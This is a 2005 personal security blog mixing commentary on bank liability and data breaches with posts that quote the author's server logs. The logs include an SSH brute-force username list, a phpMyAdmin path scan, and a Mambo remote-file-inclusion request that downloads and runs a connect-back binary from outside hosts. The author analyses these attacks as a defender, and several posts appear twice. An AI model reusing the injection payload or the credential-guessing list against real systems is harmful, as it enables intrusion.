Digital signatures sound cool -- imagine being able to sign a check using a digital signature to guarantee the check's authenticity and irrevocability. Unfortunately, there's a little difference proposed by most banks when dealing with digital signatures. Irrevocable means that if anything gets signed with your digital signature, the burden of proof is on you the consumer to prove it wasn't you. Currently, when you sign a check, the burden of proof is on the bank. If it's not your signature, you don't pay. It won't be that way using a digital signature.
Banks may say they protect you from fraud, but they really protect themselves. If your identity gets stolen, the burden of proof is yours to prove it's not you that owes all that money. When ATMs were first introduced, banks argued they were infallible and anyone claiming losses from wrongful ATM withdrawals must be trying to defraud the bank of money. It lasted until the banks went after criminals who stole from the "infallible" ATMs.
As banks and consumers go further into online transactions in the digital age, be wary. The banks are placing more and more liabilities on the consumer. When you engage in online banking, the terms of service you click "yes" to agree to generally state that all bank records are definitive. If the bank says you withdrew it, you withdrew it and that's that.
A couple of years ago, I sent my online credit card payment to the cable company by mistake. I tried in vain to get a refund and settled for having a credit on my account that would cover a year of cable. At the end of that year, the fraud investigator decided that she couldn't find the money in the cable company's accounting system, and removed the credit from my account. After I found my bank statement from a year earlier, faxed it to her, and got my bank to call, we cleared things up, but the burden of proof was on me. And my bank wasn't that helpful, either, insisting that I find the bank statements from a year ago or pay for a copy from them.
What was shocking was that a year after crediting the money into my account, the cable company couldn't track its own cash, and assumed it must have been some fraud. The burden of proof was on me, and I really didn't enjoy tracking down a bank statement from the year before.
Wednesday, December 21, 2005
Tuesday, December 20, 2005
Do As I Say, Not As I Do?
It's easy to miss news buried back in the business section given what's going on in the front section, but this is pretty harsh. Guidance Software, which makes audit software, was itself hacked. Just about everyone who is anyone in the computer forensic investigation world uses this software. The hacker(s?) got names, card numbers, including the CVV codes on the back, which aren't even supposed to be stored, according to Visa and Mastercard guidelines. In case you're wondering, Visa and MC spell out exactly what measures merchants should take to protect this data, and it appears that Guidance violated several of them, resulting in a massive catch for the hackers.
You'd think you'd be safe, purchasing software with a credit card from a premier security software company. Following these guidelines is more important than ever, since hackers are no longer interested in mere website defacements. They're going after the money.
Visit a bank. Note the security measures. They don't leave money lying around. Even if they did, it wouldn't be legal to steal it, but you also wouldn't keep your money there.
Saturday, December 10, 2005
A Couple of Schneier Entries Everyone Should Read
P>Security guru Bruce Schneier has a couple of recent news items on his blog that everyone should read. First off is the tale of backup tapes containing millions of banking records that were "lost." It turns out they weren't lost at all. The package control system was hacked to make the tape delivery a low-security item not requiring multiple signatures. After the package was stolen, hackers replaced the original security settings on the package. For companies that use paid off-site storage contractors, this is very scary.
Dr. Scheier's second entry is about a story in Nature, a scholarly scientific journal to which I subscribe and have used for writing reviews for my classes. Apparently, not everything in Nature is peer-reviewed, and a paper on a new type of encryption turned out to be almost complete bunk. Of course, you can't read the original piece in Nature without subscribing, (I got the student rate), but Schneier has an excellent critique.
Friday, December 9, 2005
What They Do at Other IST Schools
OK, picking out hacking attempts from logfiles is getting tired, so I promise, just one more. Apparently, at other IST schools, attempting to log on to other peoples' servers is what they teach. I see the entries regularly in my emails from Logwatch. What makes this one different is that it comes from an IST school like mine.
This brings up the (tired old) subject of University networks. They need to remain open and useful to students and professors, but they need to be protected from abuse and being used to abuse others. Preventing attacks like these from a campus would be hard. You could block port 22 outbound, but that would cut off a lot of legitimate activity. You could have all students sign an acceptable use policy, which might help you enforce rules against someone when you catch them. You could monitor network traffic for patterns like these, but that would involve monitoring a lot of network traffic at great expense. Universities charge enough without having to purchase a lot of monitoring equipment and software and hiring staff to watch its students, but this is what the Federal government wants them to do. Given how many attacks originate at Universities, it's easy to understand why. The Morris worm nearly took down the Internet from a University almost twenty years ago.
The more things change...
Logwatch entries:
sshd:
Authentication Failures:
unknown (ist.pct.edu): 101 Time(s)
apache (ist.pct.edu): 1 Time(s)
bin (ist.pct.edu): 1 Time(s)
mail (ist.pct.edu): 1 Time(s)
mysql (ist.pct.edu): 1 Time(s)
nobody (ist.pct.edu): 1 Time(s)
root (ist.pct.edu): 1 Time(s)
xfs (ist.pct.edu): 1 Time(s)
Invalid Users:
Unknown Account: 101 Time(s)
Failed logins from these:
admin/password from ::ffff:72.20.218.49: 1 Time(s)
adsl/password from ::ffff:72.20.218.49: 1 Time(s)
akon/password from ::ffff:72.20.218.49: 1 Time(s)
chun/password from ::ffff:72.20.218.49: 1 Time(s)
cisco/password from ::ffff:72.20.218.49: 1 Time(s)
cyd/password from ::ffff:72.20.218.49: 1 Time(s)
deamon/password from ::ffff:72.20.218.49: 1 Time(s)
dsl/password from ::ffff:72.20.218.49: 1 Time(s)
favorites/password from ::ffff:72.20.218.49: 1 Time(s)
fuji/password from ::ffff:72.20.218.49: 1 Time(s)
fujiwara/password from ::ffff:72.20.218.49: 1 Time(s)
fukumoto/password from ::ffff:72.20.218.49: 1 Time(s)
genki/password from ::ffff:72.20.218.49: 1 Time(s)
granlumie/password from ::ffff:72.20.218.49: 1 Time(s)
guest/password from ::ffff:72.20.218.49: 1 Time(s)
hagiwara/password from ::ffff:72.20.218.49: 1 Time(s)
hakko/password from ::ffff:72.20.218.49: 1 Time(s)
hayashi/password from ::ffff:72.20.218.49: 2 Time(s)
hayashy/password from ::ffff:72.20.218.49: 1 Time(s)
hiramara/password from ::ffff:72.20.218.49: 1 Time(s)
hiramaru/password from ::ffff:72.20.218.49: 1 Time(s)
hiroshi/password from ::ffff:72.20.218.49: 1 Time(s)
history/password from ::ffff:72.20.218.49: 1 Time(s)
hokko/password from ::ffff:72.20.218.49: 1 Time(s)
hokoyama/password from ::ffff:72.20.218.49: 1 Time(s)
horikoshi/password from ::ffff:72.20.218.49: 1 Time(s)
hotline/password from ::ffff:72.20.218.49: 1 Time(s)
hotmail/password from ::ffff:72.20.218.49: 1 Time(s)
ikanri/password from ::ffff:72.20.218.49: 1 Time(s)
info/password from ::ffff:72.20.218.49: 1 Time(s)
install/password from ::ffff:72.20.218.49: 1 Time(s)
internet/password from ::ffff:72.20.218.49: 1 Time(s)
invite/password from ::ffff:72.20.218.49: 1 Time(s)
iocha/password from ::ffff:72.20.218.49: 1 Time(s)
ishihara/password from ::ffff:72.20.218.49: 1 Time(s)
ito/password from ::ffff:72.20.218.49: 1 Time(s)
kajipar/password from ::ffff:72.20.218.49: 1 Time(s)
kakou/password from ::ffff:72.20.218.49: 1 Time(s)
kamata/password from ::ffff:72.20.218.49: 1 Time(s)
kamato/password from ::ffff:72.20.218.49: 1 Time(s)
kato/password from ::ffff:72.20.218.49: 1 Time(s)
kawakami/password from ::ffff:72.20.218.49: 1 Time(s)
kay/password from ::ffff:72.20.218.49: 1 Time(s)
ken/password from ::ffff:72.20.218.49: 1 Time(s)
kenkou/password from ::ffff:72.20.218.49: 1 Time(s)
kento/password from ::ffff:72.20.218.49: 1 Time(s)
kobe/password from ::ffff:72.20.218.49: 1 Time(s)
kohi/password from ::ffff:72.20.218.49: 1 Time(s)
kohitujikai/password from ::ffff:72.20.218.49: 1 Time(s)
kumemura/password from ::ffff:72.20.218.49: 1 Time(s)
lestat/password from ::ffff:72.20.218.49: 1 Time(s)
mac/password from ::ffff:72.20.218.49: 1 Time(s)
masumura/password from ::ffff:72.20.218.49: 1 Time(s)
matsuo/password from ::ffff:72.20.218.49: 1 Time(s)
mikata/password from ::ffff:72.20.218.49: 1 Time(s)
miura/password from ::ffff:72.20.218.49: 1 Time(s)
motoka/password from ::ffff:72.20.218.49: 1 Time(s)
motooka/password from ::ffff:72.20.218.49: 1 Time(s)
nakamoto/password from ::ffff:72.20.218.49: 1 Time(s)
nakamura/password from ::ffff:72.20.218.49: 1 Time(s)
nakayama/password from ::ffff:72.20.218.49: 1 Time(s)
new/password from ::ffff:72.20.218.49: 1 Time(s)
nuke/password from ::ffff:72.20.218.49: 1 Time(s)
otashiro/password from ::ffff:72.20.218.49: 1 Time(s)
play/password from ::ffff:72.20.218.49: 1 Time(s)
playboy/password from ::ffff:72.20.218.49: 1 Time(s)
proba/password from ::ffff:72.20.218.49: 1 Time(s)
prova/password from ::ffff:72.20.218.49: 1 Time(s)
prueba/password from ::ffff:72.20.218.49: 1 Time(s)
register/password from ::ffff:72.20.218.49: 1 Time(s)
robert/password from ::ffff:72.20.218.49: 1 Time(s)
roberto/password from ::ffff:72.20.218.49: 1 Time(s)
ryu/password from ::ffff:72.20.218.49: 1 Time(s)
saito/password from ::ffff:72.20.218.49: 1 Time(s)
sales/password from ::ffff:72.20.218.49: 2 Time(s)
search/password from ::ffff:72.20.218.49: 1 Time(s)
sesso/password from ::ffff:72.20.218.49: 1 Time(s)
sex/password from ::ffff:72.20.218.49: 1 Time(s)
shimada/password from ::ffff:72.20.218.49: 1 Time(s)
shiraki/password from ::ffff:72.20.218.49: 1 Time(s)
shiraky/password from ::ffff:72.20.218.49: 1 Time(s)
takato/password from ::ffff:72.20.218.49: 1 Time(s)
teraji/password from ::ffff:72.20.218.49: 1 Time(s)
test/password from ::ffff:72.20.218.49: 4 Time(s)
toi/password from ::ffff:72.20.218.49: 1 Time(s)
toy/password from ::ffff:72.20.218.49: 1 Time(s)
transfer/password from ::ffff:72.20.218.49: 1 Time(s)
trust/password from ::ffff:72.20.218.49: 1 Time(s)
try/password from ::ffff:72.20.218.49: 1 Time(s)
tujikai/password from ::ffff:72.20.218.49: 1 Time(s)
wap/password from ::ffff:72.20.218.49: 1 Time(s)
wara/password from ::ffff:72.20.218.49: 1 Time(s)
web/password from ::ffff:72.20.218.49: 1 Time(s)
www/password from ::ffff:72.20.218.49: 1 Time(s)
yamanaka/password from ::ffff:72.20.218.49: 1 Time(s)
yokoya/password from ::ffff:72.20.218.49: 1 Time(s)
Wednesday, November 30, 2005
Script Kiddies attack my Linux/Apache box
I am seeing attacks on popular open-source software that runs on linux, e.g.
129.27.140.4 - - [29/Nov/2005:23:00:48 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST
[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
http://148.81.141.12/cmd.gif?&cmd=cd%20/tmp;wget%20
131.155.98.128/cback;chmod%20744%20cback;./cback%20
194.112.220.37%208080;echo%20YYY;echo|
HTTP/1.1" 404 293 "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1;)"
(I have broken the line up to fit. It's one entry, or request, from my Apache 2.0 log file. It's a Fedora Core 4 install, mostly default.)
These are slightly more complex attacks, and they show the difficulty of tracking down your attacker. The requester, 129.27.140.4 tracks here: optikom2.inw.tu-graz.ac.at, -- the Graz University of Technology in Austria. But the request is calling a script from here: lilo.pjwstk.edu.pl, the POLSKO-JAPONSKA WYZSZA SZKOLA TECHNIK KOMPUTEROWYCH in Poland. It uses more code from here: pc01.irce.tue.nl , someone's computer in the Netherlands. Finally, it looks like this server gets notified: 194.112.220.37: www.lbsschrems.at, WVNET Information und Kommunikation GmbH, somone's server in Austria. That server is running phpGroupWare, and has probably already been compromised and is now being used to compromise other machines. You could check for bugs in phpGroupWare, but their server's down.
The code here, http://131.155.98.128/cback, appears to be something in C that requires some include files. The initial script, here:
http://148.81.141.12/cmd.gif is a defacement script. Note that it doesn't open in Netscape -- just IE.
<!-- Defacing Tool 2.0 by r3v3ng4ns revengans@gmail.com se for modificar o codigo, por favor, mantenha o nome de seus autores originais e por favor, entre em contato comigo... ae galera, serio, tem mta gente fdp q simplismente usa, nao seja soh um sucker do script, n seja um lammer imbecil, n seja o merda dum script kiddie, n seja um babaca, ajude a melhora-lo tambem!! -->
At least our script writer left us his email address. He just wrote the code, of course, he's not the one trying to use it to deface a site. Right. There were additional lines in my Apache log file that showed attacks against other applications (not installed on my box): wordpress, phpgroupare, drupal and awstats. What weakness do these applications have in common? Xml-rpc on php.
It looks like Apache needs a tool similar to Windows/IIS's urlscan, which prevents attacks like these from getting to the webserver in the first place. These attacks are increasingly common, but there's no newspaper headlines, as was the case with attacks that took advantage of Microsoft vulnerabilities. These don't attack a single product, but holes in applications that are built on the ability to run things at the command line from a web request. It makes for great functionality and weak security.
Weak web applications may mean your firewall is really just a router for port 80 traffic.
Tuesday, November 29, 2005
A New Attack
Just when I was running out of memory to run my new photo gallery (Gallery 2),
I checked my log files to see what was causing some issues for me. It
turns out that Gallery2 and SELinux do not get along so well, but if
you edit your policy files, it can be made to work.
The new attack:
195.6.199.220 - - [28/Nov/2005:20:06:41 -0500] "GET /phpmyadmin/main.php HTTP/1.0" 404 296 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:41 -0500] "GET /PMA/main.php HTTP/1.0" 404 289 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /admin/main.php HTTP/1.0" 404 291 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /mysql/main.php HTTP/1.0" 404 291 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /dbadmin/main.php HTTP/1.0" 404 293 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /db/main.php HTTP/1.0" 404 288 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /web/phpMyAdmin/main.php HTTP/1.0" 404 300 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /admin/pma/main.php HTTP/1.0" 404 295 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /admin/phpmyadmin/main.php HTTP/1.0" 404 302 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /admin/mysql/main.php HTTP/1.0" 404 297 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /mysql-admin/main.php HTTP/1.0" 404 297 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /phpmyadmin2/main.php HTTP/1.0" 404 297 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /phpMyAdmin-2.5.4/main.php HTTP/1.0" 404 302 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /phpMyAdmin-2.2.6/main.php HTTP/1.0" 404 302 "-" "pmafind"
Apparently, there's a new tool out called "pmafind" looking for
phpmyadmin installs. I hadn't seen this one before. I guess enough
people have phpmyadmin installed in some unprotected directory to make
this worthwhile.
More attacks to come...
I checked my log files to see what was causing some issues for me. It
turns out that Gallery2 and SELinux do not get along so well, but if
you edit your policy files, it can be made to work.
The new attack:
195.6.199.220 - - [28/Nov/2005:20:06:41 -0500] "GET /phpmyadmin/main.php HTTP/1.0" 404 296 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:41 -0500] "GET /PMA/main.php HTTP/1.0" 404 289 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /admin/main.php HTTP/1.0" 404 291 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /mysql/main.php HTTP/1.0" 404 291 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /dbadmin/main.php HTTP/1.0" 404 293 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /db/main.php HTTP/1.0" 404 288 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /web/phpMyAdmin/main.php HTTP/1.0" 404 300 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /admin/pma/main.php HTTP/1.0" 404 295 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /admin/phpmyadmin/main.php HTTP/1.0" 404 302 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /admin/mysql/main.php HTTP/1.0" 404 297 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /mysql-admin/main.php HTTP/1.0" 404 297 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /phpmyadmin2/main.php HTTP/1.0" 404 297 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /phpMyAdmin-2.5.4/main.php HTTP/1.0" 404 302 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /phpMyAdmin-2.2.6/main.php HTTP/1.0" 404 302 "-" "pmafind"
Apparently, there's a new tool out called "pmafind" looking for
phpmyadmin installs. I hadn't seen this one before. I guess enough
people have phpmyadmin installed in some unprotected directory to make
this worthwhile.
More attacks to come...
Monday, November 21, 2005
Red Hat vs. Mandrake
I grew tired of updating every package that came with Mandrake. The
most frustrating part was not finding what I needed to install, or
installing it but then configure didn't find it.
I re-downloaded Fedora Core 4 in the DVD image, burned it on the Mac.
Macs can open, create and burn ISO images using the standard Disk Tools
utility. I checked the sha1sum on the Linux box that was the FTP
staging area, because OS X doesn't seem to have a sha1sum utility, and
I didn't feel like spending time downloading, configuring and
installing one. CuteFTP balked at downloading a 2.6 GB file, too,
insisting that there wasn't space on my hard disk for it, even though
there was plenty of space. Once again, Linux command line to the rescue.
Red Hat is now installed on my antique Inspiron 7500, and it's not
perfect yet -- I'm still working on the display. But much more software
works without endless downloads configure-make-make install cycles....
most frustrating part was not finding what I needed to install, or
installing it but then configure didn't find it.
I re-downloaded Fedora Core 4 in the DVD image, burned it on the Mac.
Macs can open, create and burn ISO images using the standard Disk Tools
utility. I checked the sha1sum on the Linux box that was the FTP
staging area, because OS X doesn't seem to have a sha1sum utility, and
I didn't feel like spending time downloading, configuring and
installing one. CuteFTP balked at downloading a 2.6 GB file, too,
insisting that there wasn't space on my hard disk for it, even though
there was plenty of space. Once again, Linux command line to the rescue.
Red Hat is now installed on my antique Inspiron 7500, and it's not
perfect yet -- I'm still working on the display. But much more software
works without endless downloads configure-make-make install cycles....
Subscribe to:
Comments (Atom)